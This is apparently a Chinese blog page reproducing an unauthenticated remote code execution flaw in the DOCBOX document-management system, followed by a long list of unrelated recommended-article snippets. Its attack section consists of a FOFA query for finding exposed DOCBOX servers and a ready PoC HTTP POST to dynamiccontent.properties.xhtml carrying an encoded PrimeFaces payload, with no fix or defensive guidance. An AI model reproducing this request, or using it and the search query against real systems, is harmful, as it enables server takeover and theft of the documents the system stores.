OidBoy_G
OidBoy_G

DOCBOX dynamiccontent.properties.xhtml RCE漏洞复现

0x01 产品简介

 DOCBOX是一款具有恢复保证的文档管理系统,高效、快如闪电、防审核、简单,从模拟切换到数字并使用 DOCBOX® 归档您的文档。

0x02 漏洞概述

  DOCBOX电子文档管理系统4.2.0版本中dynamiccontent.properties.xhtml接口存在远程代码执行漏洞,未经身份认证的攻击者可以获取服务器权限。

0x03 复现环境

FOFA:body="docbox.webapp"

DOCBOX dynamiccontent.properties.xhtml RCE漏洞复现_第1张图片

0x04 漏洞复现

PoC

POST /docbox.webapp/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fE

你可能感兴趣的:(漏洞复现,安全,web安全)

  • 双亲委派作用 羽愿 jvm
    1.双亲委派在Java中,双薪委派通常是指双亲委派模型,它是Java类加载器的一种工作模式,用于确保类加载的安全性和一致性。以下是其相关介绍:定义与作用定义:双亲委派模型要求除了顶层的启动类加载器外,其余的类加载器都应当有自己的父类加载器。当一个类加载器收到类加载请求时,它首先不会自己去尝试加载这个类,而是把请求委派给父类加载器去完成,每一层的类加载器都是如此,直到顶层的启动类加载器。如果父类加载
  • 【零基础到精通】小白如何自学网络安全 黑客demon web安全网络安全计算机网络黑客技术网络安全
    小白人群想学网安但是不知道从哪入手?一篇文章告诉你如何在4个月内吃透网安课程,掌握网安技术一、基础阶段1.了解网安相关基础知识了解中华人民共和国网络安全法、熟知网络安全的相关概念:包括信息安全、风险管理、网络攻防原理、认证与加密等基本概念,Linux操作系统Linux操作系统目录结构Linux命令格式Linux文件和目录操作命令Linux用户和用户组操作命令Linux查看和操作文件内容命令3.计算
  • trinitycore MySQL模块_TrinityCore MMORPG服务器设计分析 Florelle trinitycoreMySQL模块
    本文是通过TrinityCore研究从而对MMORPG服务器设计分析。网络字节序ByteBuffer是字节(unsignedchar类型)处理,没有大小端处理。在网络通信应用程序上,这种是经常有的,网络是通过字节发送。消息包格式:包头+包类型+包体包头rc4加密登录认证是(srp6)安全远程密码第六版协议,包类型是占一字节。游戏中,包类型占1.5字节。1、封包重载&operator>按顺序把数据解
  • Scala语言的安全开发 萧月霖 包罗万象golang开发语言后端
    Scala语言的安全开发引言在现代软件开发中,安全性是一个不可忽视的重要因素。特别是在处理敏感数据和用户信息时,确保代码的安全性尤为重要。Scala语言以其强大的功能和灵活性,在大数据处理和并发编程中受到了广泛的关注与应用。然而,Scala虽然在设计上考虑了类型安全和并发编程的特性,但程序员在开发中仍需要注意各种安全问题,以防止潜在的安全漏洞。本文将深入探讨在Scala语言开发中如何实现安全性保障
  • C++:智能指针 Ragef C++语法与数据结构c++开发语言
    目录RAIIC++标准库智能指针auto_ptrunique_ptrshared_ptr循环引用问题shared_ptr的线程安全问题weak_ptrRAIIRAII是ResourceAcquisitionIsInitialization的缩写,他是一种资源管理的类的设计思想本质是利用对象生命周期来管理获取到的动态资源,避免资源泄漏RAII在获取资源时把资源委托给一个对象,控制着对资源的访问,资源
  • 基于 STM32 的智能电动车防盗与管理系统 STM32发烧友 stm32嵌入式硬件单片机
    1.引言随着电动车的普及,其防盗问题成为广大用户关注的焦点。智能电动车防盗与管理系统不仅能有效防止车辆被盗,还能为用户提供车辆状态监控、远程控制等便捷功能。本文设计了一款基于STM32的智能电动车防盗与管理系统,集成了防盗报警、车辆状态监测、远程通信等功能,旨在提升电动车的安全性和管理效率。2.系统设计2.1硬件设计主控芯片:STM32L4系列,低功耗高性能,满足系统长时间稳定运行需求,负责整体逻
  • 0day 蓝凌EKP系统接口sysFormMainDataInsystemWebservice存在任意文件读取漏洞 漏洞库-网络安全 ZeroDay漏洞库网络安全运维网络攻击模型安全架构网络安全系统安全
    0x01阅读须知技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!0x02产品概述蓝凌EKP系统接口sysFormMainDataInsystemWebser
  • 7招,实现安全高效的流水线管理 阿里云云栖号 云栖号技术分享安全devops运维
    简介:云效团队多年来为阿里巴巴内部(Aone)和云上企业用户(云效)分别提供研发运维工具,并致力于打造企业级一站式的DevOps平台,更多关注不同类型的企业用户在使用过程中的管理与协作场景,本文将重点介绍高效安全管理云效流水线的7招。概述传统流水线Pipeline工具,包括Jenkins、Teamcity、TravisCI等产品,作为企业DevOps中持续集成/持续交付的核心工具,从核心功能上来说
  • 微软开源用于大规模查找并修复漏洞的开发者工具 Project OneFuzz 框架 奇安信代码卫士 java编程语言微软人工智能安全
    聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队近日,微软发布公告宣布开源用于大规模查找并修复漏洞的自动化工具OneFuzz框架。如下为全文:微软致力于和社区以及客户一起持续改进并调整平台和产品,抵御多变复杂的威胁局势。今年早些时候,我们宣布顺应时势,将用自动开源工具替代现有的软件测试方法即“微软安全和风险检测(MicrosoftSecurityandRiskDetection)”。现
  • Ubuntu18安装zabbix qq_41872848 运维zabbix
    Ubuntu18安装zabbix所需工具MySQL5.7PHP7.2apache2准备工作出于安全考虑,zabbix只使用普通用户运行,假如你当前用户叫dog,运行zabbix后,便以dog身份运行。但是如果你在root环境下运行zabbix,那么zabbix将会主动尝试以zabbix身份来运行。所以这里需要创建zabbix的用户,如下:groupaddzabbixuseradd-gzabbixz
  • MongoDB(五)之安全和访问权限控制 PeterMrWang mongodbmongodb数据库安全
    MongoDB安全和访问权限控制MongoDB的访问控制能够有效保证数据库的安全,访问控制是指绑定Application监听的IP地址,设置监听端口,使用账户和密码登录一,访问控制的参数1,绑定IP地址mongod参数:**--bind_ip**``默认值是所有的IP地址都能访问,该参数指定MongoDB对外提供服务的绑定IP地址,用于监听客户端Application的连接,客户端只能使用绑定的I
  • 选择免费VPN?了解这些关键因素,确保你的上网安全与隐私! Anna_Tong 网络网络安全安全
    在互联网高度普及的今天,个人隐私和数据安全正面临越来越多的挑战。随着网络攻击、数据泄露和个人隐私侵犯事件的频发,保护个人信息变得尤为重要。VPN(虚拟私人网络)作为一种安全上网的工具,已成为许多人日常使用的必备工具。它能够加密你的网络流量,隐藏你的IP地址,从而保护你的在线隐私。但问题来了,市场上有大量的免费VPN服务,很多用户会想,既然有免费选择,为什么要花钱呢?虽然免费VPN服务提供了无需支付
  • 宾馆民宿酒店住宿管理系统+小程序项目需求分析文档 CSDN专家-赖老师(软件之家) SpringBootjava讲座微信小程序mybatisuniappvuespringbootredis
    该系统是一款专为现代酒店设计的高效、智能、易用的管理工具,旨在帮助酒店提升运营效率、优化客户体验,提升客户满意度与忠诚度,并促进业务增长。系统采用先进的云计算技术,支持小程序等多平台访问,第三方接口,确保数据安全与稳定。本系统主要针对中小型精品酒店、连锁酒店、民宿酒店、客栈等设计。主要包含功能有门店管理,门店地图,房间管理,住宿设置,房费管理(平日价,周末价,钟点房价格,节假日价格),房态管理(预
  • SQL注入语句中经常用到的URL编码 常用 浩浩测试一下 SQL注入漏洞oracle数据库网络网络安全web安全可信计算技术
    目录1.空格(Space)编码2.单引号(')编码3.双引号(")编码4.注释符(--或#)编码5.分号(;)编码6.等号(=)编码7.括号(())编码8.AND/OR操作符编码例子:防范措施SQL注入攻击是通过恶意SQL代码来篡改数据库查询语句的一种攻击方式。攻击者通常会通过输入恶意的SQL代码来绕过应用程序的安全检查。为了成功执行SQL注入攻击,攻击者有时需要使用URL编码来绕过应用程序的过滤
  • PHP 常见安全验证方法及深度解析 阿贾克斯的黎明 网络安全php安全数据库
    目录PHP常见安全验证方法及深度解析一、输入过滤与验证(一)检查整数(二)检查URL二、密码安全验证(一)密码强度检查三、防止SQL注入(一)参数化查询(如使用PDO)四、防止跨站脚本攻击(XSS)(一)输出编码在PHP开发中,保障应用程序的安全性至关重要。以下将从攻击者和防御者的角度详细介绍常见的安全验证方法及其用途,并结合代码进行深入讲解。一、输入过滤与验证(一)检查整数用途(从防御者角度):
  • CVE-2021-42013 路径穿越漏洞复现并反弹shell 小彭爱学习 网络安全网络安全web安全
    ApachehttpdCVE-2021-42013路径穿越漏洞ApacheHTTPServer是Apache基金会开源的一款流行的HTTP服务器。Apache官方在2.4.50版本中对2.4.49版本中出现的目录穿越漏洞CVE-2021-41773进行了修复,但这个修复是不完整的,CVE-2021-42013是对补丁的绕过。攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件
  • Rust编程基础教程:结构体和枚举类型 AI天才研究院 一天一门编程语言编程实践大数据人工智能语言模型JavaPython架构设计
    作者:禅与计算机程序设计艺术1.背景介绍一、什么是Rust语言?Rust是由MozillaResearch开发的一门新兴的现代通用编程语言,它的设计目标是提供高效、可靠和并发的软件。它已经成为MozillaFirefox、GoogleChrome、Dropbox等知名网站的后台语言,被越来越多的初创公司、小型公司和企业采用。它拥有独特的安全保证、极高的性能、实时性能保证以及活跃的社区支持。二、为什
  • 使用arduino玩基于esp8266的nodemcu开发板 一个小网管 Arduinoarduinoesp8266nodemcu
    一、简介中秋节到图书馆看书,看到了arduino方面的书籍,里面有提到ESP8266模块。让我想起我抽屉里吃灰很久了的基于esp8266的nodemcu开发板。于是把书借回家研究了一下。这里做个记录。二、我目前在使用的云服务器推荐学Linux不搞个云服务器始终感觉不爽!要稳定性、安全性、不差钱的可以使用阿里、腾讯等大厂的云服务器。本人穷屌丝一枚,所以我用的是免费的“三丰云”,同时提供"免费虚拟主机
  • 达梦数据库学习整理 bellachen2022 dba数据库开发
    达梦数据库的体系架构跟oracle差不多,属于国内首家自主创研的数据库产品,更加符合国人的使用习惯。由于国外的开源产品较少,商业定制化的产品对国家的安全和保密性并不友好,达梦数据库解决了这些难题。达梦数据库安装方便,一些参数配置在管理助手里也有中文解释比较清晰,有部分比较容易遗漏的,达梦也自动做,比如控制文件的备份等。manager工具,这个工具主要是对模式,表空间,用户管理,DMSQL,备份还原
  • 存储技术介绍 Tui_GuiGe 云计算服务器存储NASSANRAID
    存储技术介绍概述存储技术DASNASSANDAS、NAS、SAN的比较NAS和SAN的比较存储方式对象存储块存储文件存储差异比较存储接口SCSIiSCSISASSATA带宽速度换算eSATAFCFCoE可靠性技术RAID各RAID级别的比较备份快照镜像镜像与备份、拷贝、复制的比较群集并发存取相关硬件磁盘阵列存储服务器FC交换机概述存储是指根据不同的应用环境,通过采取合理、安全、有效的方式将数据保存
  • API 接口管理 架构 api接口设计 键盘上的蚂蚁- 架构
    提供给第三方的业务接口应该如何设计呢?需要从哪些方面考虑?以及如何实现这些方面?1、标准化RESTful2、安全性1)请求token(防止接口被第三方调用)token作为调用系统的凭证。token可以设置一次有效(安全性最高,完全防止接口被第三方调用),不过推荐设置时效性,减少获取获取token接口的请求频率。token建议放在请求头上,这样可以跟业务参数完全区分开。获取token一般会涉及的几个
  • AI助力精准农业:从数据到行动的智能革命 Echo_Wish 人工智能前沿技术人工智能
    AI助力精准农业:从数据到行动的智能革命农业,作为人类最古老的产业,正经历着一场前所未有的智能化变革。从传统的经验种植到现代化机械农业,再到今天的人工智能(AI)精准农业,科技的每一次跃迁都在提高农业生产效率,降低资源浪费,并增强粮食安全。AI之所以能在农业中大显身手,主要依赖于数据驱动的智能决策。通过卫星遥感、无人机、传感器、气象数据等多维度信息,AI可以帮助农民精准施肥、智能灌溉、预测病虫害,
  • 【瑞萨RH850/U2A16】学习小结:OPBT介绍 枫俊天空 瑞萨U2A学习嵌入式硬件
    文章目录OPBTOPBT介绍应用OPBTOPBT介绍U2A芯片中的OptionByte(OPBT)是用于配置芯片特定功能和属性的内存区域。通过修改OptionByte开发者能够根据需求对芯片进行灵活的配置,实现安全性和其他关键特性。应用OptionByte是芯片配置,用于存储一些关键的参数和设置。在U2A芯片中,OptionByte与BasicHardwareProtection(基本硬件保护)的
  • 【瑞萨RH850/U2A16】学习小结:MCAL多核配置 枫俊天空 Autosar_MCAL瑞萨U2AMCAL多核学习嵌入式硬件
    这里写自定义目录标题MCAL多核MCAL分核方式注意事项MCAL多核基于目前域控制器和区域控制器,融合的功能越来越多,多核使用越来越频繁,对于功能簇方式的分核,从应用层到BSW到MCAL整个功能簇放到不同的核,实现物理隔离和功能安全需求。MCAL分核方式对于瑞萨RH850芯片,mcal驱动的分核方案比Tricore个人觉得较复杂,原理也不同,RH850U2A16支持ADC/ICU/PWM/GPT/
  • Ivanti VPN 零日漏洞正在被黑客利用 程序员霸哥 程序员编程网络安全网络安全web安全面试开发语言运维python
    vanti公开披露了影响ConnectSecure(ICS)VPN设备的两个关键漏洞:CVE-2025-0282和CVE-2025-0283。网络安全公司Mandiant的报告称,CVE-2025-0282零日漏洞利用活动开始于2024年12月中旬。这一漏洞的利用引发了人们对潜在网络漏洞以及受影响组织后续损害的担忧。比较而言,CVE-2025-0282是两个漏洞中更为严重的一个,被描述为未经身份验
  • Plesk 2个安全功能介绍 Web极客码 安全网络服务器
    保护您的网站免受黑客攻击并防止重要数据泄露是我们最关心的事情。Plesk已经为您提供了一套基础的安全设置,但您是否了解还有一些高级的安全工具可以进一步提高您的安全级别呢?接下来,我们会简要介绍一些重要的安全功能。防火墙:控制网络访问防火墙是一项用于保护服务器免受外部威胁的功能,它通过过滤网络连接来阻止不安全的访问。在Plesk的防火墙设置中,您可以轻松定义哪些网络连接是允许的,哪些是需要阻止的。比
  • 应对现代电子商务的网络威胁—全面安全战略 Web极客码 实时监控服务器恶意软件
    在当今高度数字化的世界,电子商务企业面临的网络威胁比以往任何时候都更复杂和全球化。不再仅仅是简单的恶意软件或DDoS攻击,如今的威胁来源于复杂的黑客组织、精心设计的定向攻击,甚至是国家支持的网络犯罪活动。企业级电商平台,尤其是处理大量敏感用户数据和交易信息的平台,必须采取全面且前瞻性的安全措施,来防范这些新兴的威胁。1.现代网络威胁的多样性与挑战现代网络威胁的复杂性已经远远超越了过去的单一攻击手段
  • 服务器面试必备-网络知识点整理 前网易架构师-高司机 2025年最新-服务器面试经验网络面试题服务器面试面试服务器
    服务器或者运维开发在面试中几乎都不能逃避被问到网络相关的问题,因为网络在服务器开发中是实现客户端与服务器之间通信、数据传输、分布式计算以及安全性和访问控制的重要工具。了解网络的原理和技术对于服务器开发人员来说是非常重要的。因此这篇文章我将一些常用面试题整理出来,分享给大家,有兴趣的可以订阅专栏获得更多的学习机会。1、什么是IO多路复用I/O多路复用是一种用于同时监听多个IO流的机制。在传统的IO模
  • 2025网络安全工程师好就业吗?网络安全工程师就业前景如何? 网络安全教程库 web安全安全网络安全人工智能黑客技术网络
    在数字化浪潮席卷全球的今天,网络安全已经成为国家安全、社会稳定和经济发展的重要基石。作为网络安全的守护者,网络安全工程师的角色愈发重要。那么,在即将到来的2024年,网络安全工程师的就业前景究竟如何呢?他们能否在求职市场上游刃有余?今天,就让我们一起探讨这个热门话题。一、网络安全工程师:新时代的“网络侠客”在数字化时代,网络安全工程师就像是身披斗篷、手持长剑的“网络侠客”,他们守护着网络世界的安宁
  • Ada语言的语法糖 孔瑾熙 包罗万象golang开发语言后端
    Ada语言的语法糖Ada语言是一种专为大型软件系统的开发而设计的编程语言,由美国国防部在20世纪70年代初期发起并推出。作为一种强类型、结构化的编程语言,Ada不仅强调程序的安全性和可靠性,还注重可读性和可维护性。在Ada语言的发展过程中,引入了许多语法糖(SyntacticSugar)的概念,以便让程序员在编写代码时更加高效和便捷。本文将深入探讨Ada语言的语法糖特性,并介绍其在设计和编写代码过
  • 矩阵求逆(JAVA)初等行变换 qiuwanchi 矩阵求逆(JAVA)
    package gaodai.matrix; import gaodai.determinant.DeterminantCalculation; import java.util.ArrayList; import java.util.List; import java.util.Scanner; /** * 矩阵求逆(初等行变换) * @author 邱万迟 *
  • JDK timer antlove javajdkschedulecodetimer
    1.java.util.Timer.schedule(TimerTask task, long delay):多长时间(毫秒)后执行任务 2.java.util.Timer.schedule(TimerTask task, Date time):设定某个时间执行任务 3.java.util.Timer.schedule(TimerTask task, long delay,longperiod
  • JVM调优总结 -Xms -Xmx -Xmn -Xss coder_xpf jvm应用服务器
    堆大小设置JVM 中最大堆大小有三方面限制:相关操作系统的数据模型(32-bt还是64-bit)限制;系统的可用虚拟内存限制;系统的可用物理内存限制。32位系统下,一般限制在1.5G~2G;64为操作系统对内存无限制。我在Windows Server 2003 系统,3.5G物理内存,JDK5.0下测试,最大可设置为1478m。 典型设置: java -Xmx
  • JDBC连接数据库 Array_06 jdbc
    package Util; import java.sql.Connection; import java.sql.DriverManager; import java.sql.ResultSet; import java.sql.SQLException; import java.sql.Statement; public class JDBCUtil { //完
  • Unsupported major.minor version 51.0(jdk版本错误) oloz java
    java.lang.UnsupportedClassVersionError: cn/support/cache/CacheType : Unsupported major.minor version 51.0 (unable to load class cn.support.cache.CacheType) at org.apache.catalina.loader.WebappClassL
  • 用多个线程处理1个List集合 362217990 多线程threadlist集合
      昨天发了一个提问,启动5个线程将一个List中的内容,然后将5个线程的内容拼接起来,由于时间比较急迫,自己就写了一个Demo,希望对菜鸟有参考意义。。 import java.util.ArrayList; import java.util.List; import java.util.concurrent.CountDownLatch; public c
  • JSP简单访问数据库 香水浓 sqlmysqljsp
    学习使用javaBean,代码很烂,仅为留个脚印 public class DBHelper { private String driverName; private String url; private String user; private String password; private Connection connection; privat
  • Flex4中使用组件添加柱状图、饼状图等图表 AdyZhang Flex
    1.添加一个最简单的柱状图 ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 <?xml version= "1.0"&n
  • Android 5.0 - ProgressBar 进度条无法展示到按钮的前面 aijuans android
    在低于SDK < 21 的版本中,ProgressBar 可以展示到按钮前面,并且为之在按钮的中间,但是切换到android 5.0后进度条ProgressBar 展示顺序变化了,按钮再前面,ProgressBar 在后面了我的xml配置文件如下:   [html]  view plain copy   <RelativeLa
  • 查询汇总的sql baalwolf sql
    select   list.listname, list.createtime,listcount from dream_list as list ,   (select listid,count(listid) as listcount  from dream_list_user  group by listid  order by count(
  • Linux du命令和df命令区别 BigBird2012 linux
            1,两者区别             du,disk usage,是通过搜索文件来计算每个文件的大小然后累加,du能看到的文件只是一些当前存在的,没有被删除的。他计算的大小就是当前他认为存在的所有文件大小的累加和。        
  • AngularJS中的$apply,用还是不用? bijian1013 JavaScriptAngularJS$apply
            在AngularJS开发中,何时应该调用$scope.$apply(),何时不应该调用。下面我们透彻地解释这个问题。         但是首先,让我们把$apply转换成一种简化的形式。         scope.$apply就像一个懒惰的工人。它需要按照命
  • [Zookeeper学习笔记十]Zookeeper源代码分析之ClientCnxn数据序列化和反序列化 bit1129 zookeeper
    ClientCnxn是Zookeeper客户端和Zookeeper服务器端进行通信和事件通知处理的主要类,它内部包含两个类,1. SendThread 2. EventThread, SendThread负责客户端和服务器端的数据通信,也包括事件信息的传输,EventThread主要在客户端回调注册的Watchers进行通知处理   ClientCnxn构造方法   &
  • 【Java命令一】jmap bit1129 Java命令
    jmap命令的用法:   [hadoop@hadoop sbin]$ jmap Usage: jmap [option] <pid> (to connect to running process) jmap [option] <executable <core> (to connect to a
  • Apache 服务器安全防护及实战 ronin47
    此文转自IBM. Apache 服务简介 Web 服务器也称为 WWW 服务器或 HTTP 服务器 (HTTP Server),它是 Internet 上最常见也是使用最频繁的服务器之一,Web 服务器能够为用户提供网页浏览、论坛访问等等服务。 由于用户在通过 Web 浏览器访问信息资源的过程中,无须再关心一些技术性的细节,而且界面非常友好,因而 Web 在 Internet 上一推出就得到
  • unity 3d实例化位置出现布置? brotherlamp unity教程unityunity资料unity视频unity自学
    问:unity 3d实例化位置出现布置? 答:实例化的同时就可以指定被实例化的物体的位置,即 position  Instantiate (original : Object, position : Vector3, rotation : Quaternion) : Object 这样你不需要再用Transform.Position了,   如果你省略了第二个参数(
  • 《重构,改善现有代码的设计》第八章 Duplicate Observed Data bylijinnan java重构
    import java.awt.Color; import java.awt.Container; import java.awt.FlowLayout; import java.awt.Label; import java.awt.TextField; import java.awt.event.FocusAdapter; import java.awt.event.FocusE
  • struts2更改struts.xml配置目录 chiangfai struts.xml
    struts2默认是读取classes目录下的配置文件,要更改配置文件目录,比如放在WEB-INF下,路径应该写成../struts.xml(非/WEB-INF/struts.xml) web.xml文件修改如下:   <filter> <filter-name>struts2</filter-name> <filter-class&g
  • redis做缓存时的一点优化 chenchao051 redishadooppipeline
            最近集群上有个job,其中需要短时间内频繁访问缓存,大概7亿多次。我这边的缓存是使用redis来做的,问题就来了。       首先,redis中存的是普通kv,没有考虑使用hash等解结构,那么以为着这个job需要访问7亿多次redis,导致效率低,且出现很多redi
  • mysql导出数据不输出标题行 daizj mysql数据导出去掉第一行去掉标题
    当想使用数据库中的某些数据,想将其导入到文件中,而想去掉第一行的标题是可以加上-N参数 如通过下面命令导出数据: mysql -uuserName -ppasswd -hhost -Pport -Ddatabase -e " select * from tableName"  > exportResult.txt 结果为: studentid
  • phpexcel导出excel表简单入门示例 dcj3sjt126com PHPExcelphpexcel
    先下载PHPEXCEL类文件,放在class目录下面,然后新建一个index.php文件,内容如下 <?php error_reporting(E_ALL); ini_set('display_errors', TRUE); ini_set('display_startup_errors', TRUE);   if (PHP_SAPI == 'cli') die('
  • 爱情格言 dcj3sjt126com 格言
     1) I love you not because of who you are, but because of who I am when I am with you.    我爱你,不是因为你是一个怎样的人,而是因为我喜欢与你在一起时的感觉。   2) No man or woman is worth your tears, and the one who is, won‘t
  • 转 Activity 详解——Activity文档翻译 e200702084 androidUIsqlite配置管理网络应用
    activity 展现在用户面前的经常是全屏窗口,你也可以将 activity 作为浮动窗口来使用(使用设置了 windowIsFloating 的主题),或者嵌入到其他的 activity (使用 ActivityGroup )中。 当用户离开 activity 时你可以在 onPause() 进行相应的操作 。更重要的是,用户做的任何改变都应该在该点上提交 ( 经常提交到 ContentPro
  • win7安装MongoDB服务 geeksun mongodb
    1.  下载MongoDB的windows版本:mongodb-win32-x86_64-2008plus-ssl-3.0.4.zip,Linux版本也在这里下载,下载地址: http://www.mongodb.org/downloads   2.  解压MongoDB在D:\server\mongodb, 在D:\server\mongodb下创建d
  • Javascript魔法方法:__defineGetter__,__defineSetter__ hongtoushizi js
    转载自: http://www.blackglory.me/javascript-magic-method-definegetter-definesetter/ 在javascript的类中,可以用defineGetter和defineSetter_控制成员变量的Get和Set行为 例如,在一个图书类中,我们自动为Book加上书名符号: function Book(name){
  • 错误的日期格式可能导致走nginx proxy cache时不能进行304响应 jinnianshilongnian cache
    昨天在整合某些系统的nginx配置时,出现了当使用nginx cache时无法返回304响应的情况,出问题的响应头: Content-Type:text/html; charset=gb2312 Date:Mon, 05 Jan 2015 01:58:05 GMT Expires:Mon , 05 Jan 15 02:03:00 GMT Last-Modified:Mon, 05
  • 数据源架构模式之行数据入口 home198979 PHP架构行数据入口
    注:看不懂的请勿踩,此文章非针对java,java爱好者可直接略过。   一、概念 行数据入口(Row Data Gateway):充当数据源中单条记录入口的对象,每行一个实例。   二、简单实现行数据入口 为了方便理解,还是先简单实现: <?php /** * 行数据入口类 */ class OrderGateway { /*定义元数
  • Linux各个目录的作用及内容 pda158 linux脚本
    1)根目录“/”   根目录位于目录结构的最顶层,用斜线(/)表示,类似于 Windows 操作系统的“C:\“,包含Fedora操作系统中所有的目录和文件。   2)/bin   /bin   目录又称为二进制目录,包含了那些供系统管理员和普通用户使用的重要 linux命令的二进制映像。该目录存放的内容包括各种可执行文件,还有某些可执行文件的符号连接。常用的命令有:cp、d
  • ubuntu12.04上编译openjdk7 ol_beta HotSpotjvmjdkOpenJDK
    获取源码 从openjdk代码仓库获取(比较慢) 安装mercurial Mercurial是一个版本管理工具。 sudo apt-get install mercurial 将以下内容添加到$HOME/.hgrc文件中,如果没有则自己创建一个: [extensions] forest=/home/lichengwu/hgforest-crew/forest.py fe
  • 将数据库字段转换成设计文档所需的字段 vipbooks 设计模式工作正则表达式
            哈哈,出差这么久终于回来了,回家的感觉真好!         PowerDesigner的物理数据库一出来,设计文档中要改的字段就多得不计其数,如果要把PowerDesigner中的字段一个个Copy到设计文档中,那将会是一件非常痛苦的事情。
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他